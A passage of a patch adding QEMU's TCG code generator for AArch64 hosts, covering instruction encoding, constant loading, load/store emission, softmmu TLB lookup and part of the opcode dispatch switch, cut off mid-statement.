0x1ff) << 12 | rn << 5 | rd); +} + +static void tcg_out_insn_3313(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, uintptr_t scaled_uimm) +{ + /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ + tcg_out32(s, insn | I3312_TO_I3313 | scaled_uimm << 10 | rn << 5 | rd); +} + +/* Register to register move using ORR (shifted register with no shift). */ +static void tcg_out_movr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rm) +{ + tcg_out_insn(s, 3510, ORR, ext, rd, TCG_REG_XZR, rm); +} + +/* Register to register move using ADDI (move to/from SP). */ +static void tcg_out_movr_sp(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3401, ADDI, ext, rd, rn, 0); +} + +/* This function is used for the Logical (immediate) instruction group. + The value of LIMM must satisfy IS_LIMM. See the comment above about + only supporting simplified logical immediates. */ +static void tcg_out_logicali(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, uint64_t limm) +{ + unsigned h, l, r, c; + + assert(is_limm(limm)); + + h = clz64(limm); + l = ctz64(limm); + if (l == 0) { + r = 0; /* form 0....01....1 */ + c = ctz64(~limm) - 1; + if (h == 0) { + r = clz64(~limm); /* form 1..10..01..1 */ + c += r; + } + } else { + r = 64 - l; /* form 1....10....0 or 0..01..10..0 */ + c = r - h - 1; + } + if (ext == TCG_TYPE_I32) { + r &= 31; + c &= 31; + } + + tcg_out_insn_3404(s, insn, ext, rd, rn, ext, r, c); +} + +static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, + tcg_target_long value) +{ + AArch64Insn insn; + int i, wantinv, shift; + tcg_target_long svalue = value; + tcg_target_long ivalue = ~value; + tcg_target_long imask; + + /* For 32-bit values, discard potential garbage in value. For 64-bit + values within [2**31, 2**32-1], we can create smaller sequences by + interpreting this as a negative 32-bit number, while ensuring that + the high 32 bits are cleared by setting SF=0. */ + if (type == TCG_TYPE_I32 || (value & ~0xffffffffull) == 0) { + svalue = (int32_t)value; + value = (uint32_t)value; + ivalue = (uint32_t)ivalue; + type = TCG_TYPE_I32; + } + + /* Speed things up by handling the common case of small positive + and negative values specially. */ + if ((value & ~0xffffull) == 0) { + tcg_out_insn(s, 3405, MOVZ, type, rd, value, 0); + return; + } else if ((ivalue & ~0xffffull) == 0) { + tcg_out_insn(s, 3405, MOVN, type, rd, ivalue, 0); + return; + } + + /* Check for bitfield immediates. For the benefit of 32-bit quantities, + use the sign-extended value. That lets us match rotated values such + as 0xff0000ff with the same 64-bit logic matching 0xffffffffff0000ff. */ + if (is_limm(svalue)) { + tcg_out_logicali(s, I3404_ORRI, type, rd, TCG_REG_XZR, svalue); + return; + } + + /* Look for host pointer values within 4G of the PC. This happens + often when loading pointers to QEMU's own data structures. */ + if (type == TCG_TYPE_I64) { + tcg_target_long disp = (value >> 12) - ((intptr_t)s->code_ptr >> 12); + if (disp == sextract64(disp, 0, 21)) { + tcg_out_insn(s, 3406, ADRP, rd, disp); + if (value & 0xfff) { + tcg_out_insn(s, 3401, ADDI, type, rd, rd, value & 0xfff); + } + return; + } + } + + /* Would it take fewer insns to begin with MOVN? For the value and its + inverse, count the number of 16-bit lanes that are 0. */ + for (i = wantinv = imask = 0; i < 64; i += 16) { + tcg_target_long mask = 0xffffull << i; + if ((value & mask) == 0) { + wantinv -= 1; + } + if ((ivalue & mask) == 0) { + wantinv += 1; + imask |= mask; + } + } + + /* If we had more 0xffff than 0x0000, invert VALUE and use MOVN. */ + insn = I3405_MOVZ; + if (wantinv > 0) { + value = ivalue; + insn = I3405_MOVN; + } + + /* Find the lowest lane that is not 0x0000. */ + shift = ctz64(value) & (63 & -16); + tcg_out_insn_3405(s, insn, type, rd, value >> shift, shift); + + if (wantinv > 0) { + /* Re-invert the value, so MOVK sees non-inverted bits. */ + value = ~value; + /* Clear out all the 0xffff lanes. */ + value ^= imask; + } + /* Clear out the lane that we just set. */ + value &= ~(0xffffUL << shift); + + /* Iterate until all lanes have been set, and thus cleared from VALUE. */ + while (value) { + shift = ctz64(value) & (63 & -16); + tcg_out_insn(s, 3405, MOVK, type, rd, value >> shift, shift); + value &= ~(0xffffUL << shift); + } +} + +/* Define something more legible for general use. */ +#define tcg_out_ldst_r tcg_out_insn_3310 + +static void tcg_out_ldst(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, intptr_t offset) +{ + TCGMemOp size = (uint32_t)insn >> 30; + + /* If the offset is naturally aligned and in range, then we can + use the scaled uimm12 encoding */ + if (offset >= 0 && !(offset & ((1 << size) - 1))) { + uintptr_t scaled_uimm = offset >> size; + if (scaled_uimm <= 0xfff) { + tcg_out_insn_3313(s, insn, rd, rn, scaled_uimm); + return; + } + } + + /* Small signed offsets can use the unscaled encoding. */ + if (offset >= -256 && offset < 256) { + tcg_out_insn_3312(s, insn, rd, rn, offset); + return; + } + + /* Worst-case scenario, move offset to temp register, use reg offset. */ + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, offset); + tcg_out_ldst_r(s, insn, rd, rn, TCG_REG_TMP); +} + +static inline void tcg_out_mov(TCGContext *s, + TCGType type, TCGReg ret, TCGReg arg) +{ + if (ret != arg) { + tcg_out_movr(s, type, ret, arg); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, type == TCG_TYPE_I32 ? I3312_LDRW : I3312_LDRX, + arg, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, type == TCG_TYPE_I32 ? I3312_STRW : I3312_STRX, + arg, arg1, arg2); +} + +static inline void tcg_out_bfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, BFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_ubfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, UBFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_sbfm(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned int a, unsigned int b) +{ + tcg_out_insn(s, 3402, SBFM, ext, rd, rn, ext, a, b); +} + +static inline void tcg_out_extr(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, TCGReg rm, unsigned int a) +{ + tcg_out_insn(s, 3403, EXTR, ext, rd, rn, rm, a); +} + +static inline void tcg_out_shl(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int bits = ext ? 64 : 32; + int max = bits - 1; + tcg_out_ubfm(s, ext, rd, rn, bits - (m & max), max - (m & max)); +} + +static inline void tcg_out_shr(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_ubfm(s, ext, rd, rn, m & max, max); +} + +static inline void tcg_out_sar(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_sbfm(s, ext, rd, rn, m & max, max); +} + +static inline void tcg_out_rotr(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int max = ext ? 63 : 31; + tcg_out_extr(s, ext, rd, rn, rn, m & max); +} + +static inline void tcg_out_rotl(TCGContext *s, TCGType ext, + TCGReg rd, TCGReg rn, unsigned int m) +{ + int bits = ext ? 64 : 32; + int max = bits - 1; + tcg_out_extr(s, ext, rd, rn, rn, bits - (m & max)); +} + +static inline void tcg_out_dep(TCGContext *s, TCGType ext, TCGReg rd, + TCGReg rn, unsigned lsb, unsigned width) +{ + unsigned size = ext ? 64 : 32; + unsigned a = (size - lsb) & (size - 1); + unsigned b = width - 1; + tcg_out_bfm(s, ext, rd, rn, a, b); +} + +static void tcg_out_cmp(TCGContext *s, TCGType ext, TCGReg a, + tcg_target_long b, bool const_b) +{ + if (const_b) { + /* Using CMP or CMN aliases. */ + if (b >= 0) { + tcg_out_insn(s, 3401, SUBSI, ext, TCG_REG_XZR, a, b); + } else { + tcg_out_insn(s, 3401, ADDSI, ext, TCG_REG_XZR, a, -b); + } + } else { + /* Using CMP alias SUBS wzr, Wn, Wm */ + tcg_out_insn(s, 3502, SUBS, ext, TCG_REG_XZR, a, b); + } +} + +static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - s->code_ptr; + assert(offset == sextract64(offset, 0, 26)); + tcg_out_insn(s, 3206, B, offset); +} + +static inline void tcg_out_goto_noaddr(TCGContext *s) +{ + /* We pay attention here to not modify the branch target by reading from + the buffer. This ensure that caches and memory are kept coherent during + retranslation. Mask away possible garbage in the high bits for the + first translation, while keeping the offset bits for retranslation. */ + uint32_t old = tcg_in32(s); + tcg_out_insn(s, 3206, B, old); +} + +static inline void tcg_out_goto_cond_noaddr(TCGContext *s, TCGCond c) +{ + /* See comments in tcg_out_goto_noaddr. */ + uint32_t old = tcg_in32(s) >> 5; + tcg_out_insn(s, 3202, B_C, c, old); +} + +static inline void tcg_out_callr(TCGContext *s, TCGReg reg) +{ + tcg_out_insn(s, 3207, BLR, reg); +} + +static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - s->code_ptr; + if (offset == sextract64(offset, 0, 26)) { + tcg_out_insn(s, 3206, BL, offset); + } else { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); + tcg_out_callr(s, TCG_REG_TMP); + } +} + +void aarch64_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr) +{ + tcg_insn_unit *code_ptr = (tcg_insn_unit *)jmp_addr; + tcg_insn_unit *target = (tcg_insn_unit *)addr; + + reloc_pc26(code_ptr, target); + flush_icache_range(jmp_addr, jmp_addr + 4); +} + +static inline void tcg_out_goto_label(TCGContext *s, int label_index) +{ + TCGLabel *l = &s->labels[label_index]; + + if (!l->has_value) { + tcg_out_reloc(s, s->code_ptr, R_AARCH64_JUMP26, label_index, 0); + tcg_out_goto_noaddr(s); + } else { + tcg_out_goto(s, l->u.value_ptr); + } +} + +static void tcg_out_brcond(TCGContext *s, TCGMemOp ext, TCGCond c, TCGArg a, + TCGArg b, bool b_const, int label) +{ + TCGLabel *l = &s->labels[label]; + intptr_t offset; + bool need_cmp; + + if (b_const && b == 0 && (c == TCG_COND_EQ || c == TCG_COND_NE)) { + need_cmp = false; + } else { + need_cmp = true; + tcg_out_cmp(s, ext, a, b, b_const); + } + + if (!l->has_value) { + tcg_out_reloc(s, s->code_ptr, R_AARCH64_CONDBR19, label, 0); + offset = tcg_in32(s) >> 5; + } else { + offset = l->u.value_ptr - s->code_ptr; + assert(offset == sextract64(offset, 0, 19)); + } + + if (need_cmp) { + tcg_out_insn(s, 3202, B_C, c, offset); + } else if (c == TCG_COND_EQ) { + tcg_out_insn(s, 3201, CBZ, ext, a, offset); + } else { + tcg_out_insn(s, 3201, CBNZ, ext, a, offset); + } +} + +static inline void tcg_out_rev64(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV64, TCG_TYPE_I64, rd, rn); +} + +static inline void tcg_out_rev32(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV32, TCG_TYPE_I32, rd, rn); +} + +static inline void tcg_out_rev16(TCGContext *s, TCGReg rd, TCGReg rn) +{ + tcg_out_insn(s, 3507, REV16, TCG_TYPE_I32, rd, rn); +} + +static inline void tcg_out_sxt(TCGContext *s, TCGType ext, TCGMemOp s_bits, + TCGReg rd, TCGReg rn) +{ + /* Using ALIASes SXTB, SXTH, SXTW, of SBFM Xd, Xn, #0, #7|15|31 */ + int bits = (8 << s_bits) - 1; + tcg_out_sbfm(s, ext, rd, rn, 0, bits); +} + +static inline void tcg_out_uxt(TCGContext *s, TCGMemOp s_bits, + TCGReg rd, TCGReg rn) +{ + /* Using ALIASes UXTB, UXTH of UBFM Wd, Wn, #0, #7|15 */ + int bits = (8 << s_bits) - 1; + tcg_out_ubfm(s, 0, rd, rn, 0, bits); +} + +static void tcg_out_addsubi(TCGContext *s, int ext, TCGReg rd, + TCGReg rn, int64_t aimm) +{ + if (aimm >= 0) { + tcg_out_insn(s, 3401, ADDI, ext, rd, rn, aimm); + } else { + tcg_out_insn(s, 3401, SUBI, ext, rd, rn, -aimm); + } +} + +static inline void tcg_out_addsub2(TCGContext *s, int ext, TCGReg rl, + TCGReg rh, TCGReg al, TCGReg ah, + tcg_target_long bl, tcg_target_long bh, + bool const_bl, bool const_bh, bool sub) +{ + TCGReg orig_rl = rl; + AArch64Insn insn; + + if (rl == ah || (!const_bh && rl == bh)) { + rl = TCG_REG_TMP; + } + + if (const_bl) { + insn = I3401_ADDSI; + if ((bl < 0) ^ sub) { + insn = I3401_SUBSI; + bl = -bl; + } + tcg_out_insn_3401(s, insn, ext, rl, al, bl); + } else { + tcg_out_insn_3502(s, sub ? I3502_SUBS : I3502_ADDS, ext, rl, al, bl); + } + + insn = I3503_ADC; + if (const_bh) { + /* Note that the only two constants we support are 0 and -1, and + that SBC = rn + ~rm + c, so adc -1 is sbc 0, and vice-versa. */ + if ((bh != 0) ^ sub) { + insn = I3503_SBC; + } + bh = TCG_REG_XZR; + } else if (sub) { + insn = I3503_SBC; + } + tcg_out_insn_3503(s, insn, ext, rh, ah, bh); + + tcg_out_mov(s, ext, orig_rl, rl); +} + +#ifdef CONFIG_SOFTMMU +/* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, + * int mmu_idx, uintptr_t ra) + */ +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +/* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, + * uintxx_t val, int mmu_idx, uintptr_t ra) + */ +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; + +static inline void tcg_out_adr(TCGContext *s, TCGReg rd, void *target) +{ + ptrdiff_t offset = tcg_pcrel_diff(s, target); + assert(offset == sextract64(offset, 0, 21)); + tcg_out_insn(s, 3406, ADR, rd, offset); +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc = lb->opc; + TCGMemOp size = opc & MO_SIZE; + + reloc_pc19(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_X0, TCG_AREG0); + tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X2, lb->mem_index); + tcg_out_adr(s, TCG_REG_X3, lb->raddr); + tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]); + if (opc & MO_SIGN) { + tcg_out_sxt(s, lb->type, size, lb->datalo_reg, TCG_REG_X0); + } else { + tcg_out_mov(s, size == MO_64, lb->datalo_reg, TCG_REG_X0); + } + + tcg_out_goto(s, lb->raddr); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc = lb->opc; + TCGMemOp size = opc & MO_SIZE; + + reloc_pc19(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_X0, TCG_AREG0); + tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); + tcg_out_mov(s, size == MO_64, TCG_REG_X2, lb->datalo_reg); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X3, lb->mem_index); + tcg_out_adr(s, TCG_REG_X4, lb->raddr); + tcg_out_call(s, qemu_st_helpers[opc]); + tcg_out_goto(s, lb->raddr); +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGType ext, TCGReg data_reg, TCGReg addr_reg, + int mem_index, tcg_insn_unit *raddr, + tcg_insn_unit *label_ptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->type = ext; + label->datalo_reg = data_reg; + label->addrlo_reg = addr_reg; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr; +} + +/* Load and compare a TLB entry, emitting the conditional jump to the + slow path for the failure case, which will be patched later when finalizing + the slow path. Generated code returns the host addend in X1, + clobbers X0,X2,X3,TMP. */ +static void tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, TCGMemOp s_bits, + tcg_insn_unit **label_ptr, int mem_index, + bool is_read) +{ + TCGReg base = TCG_AREG0; + int tlb_offset = is_read ? + offsetof(CPUArchState, tlb_table[mem_index][0].addr_read) + : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write); + + /* Extract the TLB index from the address into X0. + X0 = + addr_reg */ + tcg_out_ubfm(s, TARGET_LONG_BITS == 64, TCG_REG_X0, addr_reg, + TARGET_PAGE_BITS, TARGET_PAGE_BITS + CPU_TLB_BITS); + + /* Store the page mask part of the address and the low s_bits into X3. + Later this allows checking for equality and alignment at the same time. + X3 = addr_reg & (PAGE_MASK | ((1 << s_bits) - 1)) */ + tcg_out_logicali(s, I3404_ANDI, TARGET_LONG_BITS == 64, TCG_REG_X3, + addr_reg, TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + + /* Add any "high bits" from the tlb offset to the env address into X2, + to take advantage of the LSL12 form of the ADDI instruction. + X2 = env + (tlb_offset & 0xfff000) */ + if (tlb_offset & 0xfff000) { + tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_X2, base, + tlb_offset & 0xfff000); + base = TCG_REG_X2; + } + + /* Merge the tlb index contribution into X2. + X2 = X2 + (X0 << CPU_TLB_ENTRY_BITS) */ + tcg_out_insn(s, 3502S, ADD_LSL, TCG_TYPE_I64, TCG_REG_X2, base, + TCG_REG_X0, CPU_TLB_ENTRY_BITS); + + /* Merge "low bits" from tlb offset, load the tlb comparator into X0. + X0 = load [X2 + (tlb_offset & 0x000fff)] */ + tcg_out_ldst(s, TARGET_LONG_BITS == 32 ? I3312_LDRW : I3312_LDRX, + TCG_REG_X0, TCG_REG_X2, tlb_offset & 0xfff); + + /* Load the tlb addend. Do that early to avoid stalling. + X1 = load [X2 + (tlb_offset & 0xfff) + offsetof(addend)] */ + tcg_out_ldst(s, I3312_LDRX, TCG_REG_X1, TCG_REG_X2, + (tlb_offset & 0xfff) + (offsetof(CPUTLBEntry, addend)) - + (is_read ? offsetof(CPUTLBEntry, addr_read) + : offsetof(CPUTLBEntry, addr_write))); + + /* Perform the address comparison. */ + tcg_out_cmp(s, (TARGET_LONG_BITS == 64), TCG_REG_X0, TCG_REG_X3, 0); + + /* If not equal, we jump to the slow path. */ + *label_ptr = s->code_ptr; + tcg_out_goto_cond_noaddr(s, TCG_COND_NE); +} + +#endif /* CONFIG_SOFTMMU */ + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGMemOp memop, TCGType ext, + TCGReg data_r, TCGReg addr_r, TCGReg off_r) +{ + const TCGMemOp bswap = memop & MO_BSWAP; + + switch (memop & MO_SSIZE) { + case MO_UB: + tcg_out_ldst_r(s, I3312_LDRB, data_r, addr_r, off_r); + break; + case MO_SB: + tcg_out_ldst_r(s, ext ? I3312_LDRSBX : I3312_LDRSBW, + data_r, addr_r, off_r); + break; + case MO_UW: + tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev16(s, data_r, data_r); + } + break; + case MO_SW: + if (bswap) { + tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, off_r); + tcg_out_rev16(s, data_r, data_r); + tcg_out_sxt(s, ext, MO_16, data_r, data_r); + } else { + tcg_out_ldst_r(s, ext ? I3312_LDRSHX : I3312_LDRSHW, + data_r, addr_r, off_r); + } + break; + case MO_UL: + tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev32(s, data_r, data_r); + } + break; + case MO_SL: + if (bswap) { + tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, off_r); + tcg_out_rev32(s, data_r, data_r); + tcg_out_sxt(s, TCG_TYPE_I64, MO_32, data_r, data_r); + } else { + tcg_out_ldst_r(s, I3312_LDRSWX, data_r, addr_r, off_r); + } + break; + case MO_Q: + tcg_out_ldst_r(s, I3312_LDRX, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev64(s, data_r, data_r); + } + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGMemOp memop, + TCGReg data_r, TCGReg addr_r, TCGReg off_r) +{ + const TCGMemOp bswap = memop & MO_BSWAP; + + switch (memop & MO_SIZE) { + case MO_8: + tcg_out_ldst_r(s, I3312_STRB, data_r, addr_r, off_r); + break; + case MO_16: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev16(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRH, data_r, addr_r, off_r); + break; + case MO_32: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev32(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRW, data_r, addr_r, off_r); + break; + case MO_64: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev64(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRX, data_r, addr_r, off_r); + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_ld(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp memop, TCGType ext, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + tcg_insn_unit *label_ptr; + + tcg_out_tlb_read(s, addr_reg, s_bits, &label_ptr, mem_index, 1); + tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, TCG_REG_X1); + add_qemu_ldst_label(s, true, memop, ext, data_reg, addr_reg, + mem_index, s->code_ptr, label_ptr); +#else /* !CONFIG_SOFTMMU */ + tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, + GUEST_BASE ? TCG_REG_GUEST_BASE : TCG_REG_XZR); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_qemu_st(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp memop, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + tcg_insn_unit *label_ptr; + + tcg_out_tlb_read(s, addr_reg, s_bits, &label_ptr, mem_index, 0); + tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, TCG_REG_X1); + add_qemu_ldst_label(s, false, memop, s_bits == MO_64, data_reg, addr_reg, + mem_index, s->code_ptr, label_ptr); +#else /* !CONFIG_SOFTMMU */ + tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, + GUEST_BASE ? TCG_REG_GUEST_BASE : TCG_REG_XZR); +#endif /* CONFIG_SOFTMMU */ +} + +static tcg_insn_unit *tb_ret_addr; + +static void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg args[TCG_MAX_OP_ARGS], + const int const_args[TCG_MAX_OP_ARGS]) +{ + /* 99% of the time, we can signal the use of extension registers + by looking to see if the opcode handles 64-bit data. */ + TCGType ext = (s->tcg_op_defs[opc].flags & TCG_OPF_64BIT) != 0; + + /* Hoist the loads of the most common arguments. */ + TCGArg a0 = args[0]; + TCGArg a1 = args[1]; + TCGArg a2 = args[2]; + int c2 = const_args[2]; + + /* Some operands are defined with "rZ" constraint, a register or + the zero register. These need not actually test args[I] == 0. */ +#define REG0(I) (const_args[I] ? TCG_REG_XZR : (TCGReg)args[I]) + + switch (opc) { + case INDEX_op_exit_tb: + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_X0, a0); + tcg_out_goto(s, tb_ret_addr); + break; + + case INDEX_op_goto_tb: +#ifndef USE_DIRECT_JUMP +#error "USE_DIRECT_JUMP required for aarch64" +#endif + assert(s->tb_jmp_offset != NULL); /* consistency for USE_DIRECT_JUMP */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* actual branch destination will be patched by + aarch64_tb_set_jmp_target later, beware retranslation. */ + tcg_out_goto_noaddr(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + + case INDEX_op_br: + tcg_out_goto_label(s, a0); + break; + + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_ldst(s, I3312_LDRB, a0, a1, a2); + break; + case INDEX_op_ld8s_i32: + tcg_out_ldst(s, I3312_LDRSBW, a0, a1, a2); + break; + case INDEX_op_ld8s_i64: + tcg_out_ldst(s, I3312_LDRSBX, a0, a1, a2); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_ldst(s, I3312_LDRH, a0, a1, a2); + break; + case INDEX_op_ld16s_i32: + tcg_out_ldst(s, I3312_LDRSHW, a0, a1, a2); + break; + case INDEX_op_ld16s_i64: + tcg_out_ldst(s, I3312_LDRSHX, a0, a1, a2); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ldst(s, I3312_LDRW, a0, a1, a2); + break; + case INDEX_op_ld32s_i64: + tcg_out_ldst(s, I3312_LDRSWX, a0, a1, a2); + break; + case INDEX_op_ld_i64: + tcg_out_ldst(s, I3312_LDRX, a0, a1, a2); + break; + + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_ldst(s, I3312_STRB, REG0(0), a1, a2); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_ldst(s, I3312_STRH, REG0(0), a1, a2); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_ldst(s, I3312_STRW, REG0(0), a1, a2); + break; + case INDEX_op_st_i64: + tcg_out_ldst(s, I3312_STRX, REG0(0), a1, a2); + break; + + case INDEX_op_add_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_add_i64: + if (c2) { + tcg_out_addsubi(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3502, ADD, ext, a0, a1, a2); + } + break; + + case INDEX_op_sub_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_sub_i64: + if (c2) { + tcg_out_addsubi(s, ext, a0, a1, -a2); + } else { + tcg_out_insn(s, 3502, SUB, ext, a0, a1, a2); + } + break; + + case INDEX_op_neg_i64: + case INDEX_op_neg_i32: + tcg_out_insn(s, 3502, SUB, ext, a0, TCG_REG_XZR, a1); + break; + + case INDEX_op_and_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_and_i64: + if (c2) { + tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, AND, ext, a0, a1, a2); + } + break; + + case INDEX_op_andc_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_andc_i64: + if (c2) { + tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, BIC, ext, a0, a1, a2); + } + break; + + case INDEX_op_or_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_or_i64: + if (c2) { + tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, ORR, ext, a0, a1, a2); + } + break; + + case INDEX_op_orc_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_orc_i64: + if (c2) { + tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, ORN, ext, a0, a1, a2); + } + break; + + case INDEX_op_xor_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_xor_i64: + if (c2) { + tcg_out_logicali(s, I3404_EORI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, EOR, ext, a0, a1, a2); + } + break; + + case INDEX_op_eqv_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_eqv_i64: + if (c2) { + tcg_out_logicali(s, I3404_EORI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, EON, ext, a0, a1, a2); + } + break; + + case INDEX_op_not_i64: + case INDEX_op_not_i32: + tcg_out_insn(s, 3510, ORN, ext, a0, TCG_REG_XZR, a1); + break; + + case INDEX_op_mul_i64: + case INDEX_op_mul_i32: + tcg_out_insn(s, 3509, MADD, ext, a0, a1, a2, TCG_REG_XZR); + break; + + case INDEX_op_div_i64: + case INDEX_op_div_i32: + tcg_out_insn(s, 3508, SDIV, ext, a0, a1, a2); + break; + case INDEX_op_divu_i64: + case INDEX_op_divu_i32: + tcg_out_insn(s, 3508, UDIV, ext, a0, a1, a2); + break; + + case INDEX_op_rem_i64: + case INDEX_op_rem_i32: + tcg_out_insn(s, 3508, SDIV, ext, TCG_REG_TMP, a1, a2); + tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, 